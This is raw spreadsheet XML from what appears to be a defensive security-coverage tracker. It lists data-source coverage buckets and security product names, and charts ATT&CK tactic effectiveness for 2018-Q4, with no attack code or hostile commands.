    <t>Count of EDR DS Coveage%</t>
  </si>
  <si>
    <t>0-20</t>
  </si>
  <si>
    <t>20-40</t>
  </si>
  <si>
    <t>40-60</t>
  </si>
  <si>
    <t>60-80</t>
  </si>
  <si>
    <t>80-100</t>
  </si>
  <si>
    <t>(blank)</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of SYSMON DS Coverage%</t>
  </si>
  <si>
    <t>Count of BLUEPROXY DS Coverage%</t>
  </si>
  <si>
    <t>Count of AV-1 Coverage %</t>
  </si>
  <si>
    <t>Count of AV-2 Coverage %</t>
  </si>
  <si>
    <t>Count of BRO Coverage %</t>
  </si>
  <si>
    <t>Count of MOLOCH Coverage %</t>
  </si>
  <si>
    <t>Carbon Black Response</t>
  </si>
  <si>
    <t>Nessus Security Center</t>
  </si>
  <si>
    <t>Zscaler</t>
  </si>
  <si>
    <t>AMP</t>
  </si>
  <si>
    <t>CyberArk</t>
  </si>
  <si>
    <t>Suricata</t>
  </si>
  <si>
    <t>FirePOWER</t>
  </si>
  <si>
    <t>Gigamon</t>
  </si>
  <si>
    <t>Vormetric</t>
  </si>
  <si>
    <t>Imperva</t>
  </si>
  <si>
    <t>Splunk</t>
  </si>
  <si>
    <t>Digital Guardian</t>
  </si>
  <si>
    <t xml:space="preserve">Contrast Security </t>
  </si>
  <si>
    <t>Mimecast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</si>
</sst>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4"/>
      <color rgb="FF000000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="18"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF252525"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="13"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="15">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0070C0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="1" tint="0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF4F4F"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF7757"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFAE5D"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F57B"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD1DCFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7D9CFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF4E4E"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5"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s>
  <cellStyleXfs count="30">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="9" fontId="10"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71">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5"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1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="1" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11"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0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="9" fontId="7" fillId="0" borderId="1" xfId="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="8" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="9" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="10" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="2" fontId="1" fillId="14" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="18" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="12" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="9" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="15" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="30">
    <cellStyle name="Followed Hyperlink" xfId="29" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="27" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="23" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="25" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="11" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="13" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="21" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="15" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="17" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="19" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="9" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="3" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="5" builtinId="9" hidden="1"/>
    <cellStyle name="Followed Hyperlink" xfId="7" builtinId="9" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="28" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="24" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="26" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="16" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="18" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="20" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="22" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="2" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="4" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="6" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="14" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="8" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="10" builtinId="8" hidden="1"/>
    <cellStyle name="Hyperlink" xfId="12" builtinId="8" hidden="1"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Percent" xfId="1" builtinId="5"/>
  </cellStyles>
  <dxfs count="7">
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFF2F57B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF7757"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFD1DCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFAE5D"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF7D9CFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF4F4F"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="none">
          <bgColor auto="1"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFD1DCFF"/>
      <color rgb="FFFF4E4E"/>
      <color rgb="FFFF7757"/>
      <color rgb="FFFF4F4F"/>
      <color rgb="FF648ACE"/>
      <color rgb="FF7D9CFF"/>
      <color rgb="FFF2F57B"/>
      <color rgb="FFFFAE5D"/>
      <color rgb="FF6A8ED0"/>
      <color rgb="FFA9DA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Effectiveness Trend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5.2729500946132032E-2"/>
          <c:y val="9.4809589907745767E-2"/>
          <c:w val="0.84549010397034507"/>
          <c:h val="0.84955119307290639"/>
        </c:manualLayout>
      </c:layout>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Persistence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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$B$2:$B$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Privilege Escalation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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$C$2:$C$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Defense Evasion</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$D$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Credential Access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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$E$2:$E$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000003-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Discovery</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$F$2:$F$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000004-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Lateral Movement</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$G$2:$G$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$H$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Execution</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$H$2:$H$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="7"/>
          <c:order val="7"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$I$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Collection</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$I$2:$I$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000007-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="8"/>
          <c:order val="8"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$J$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Exfiltration</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$J$2:$J$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
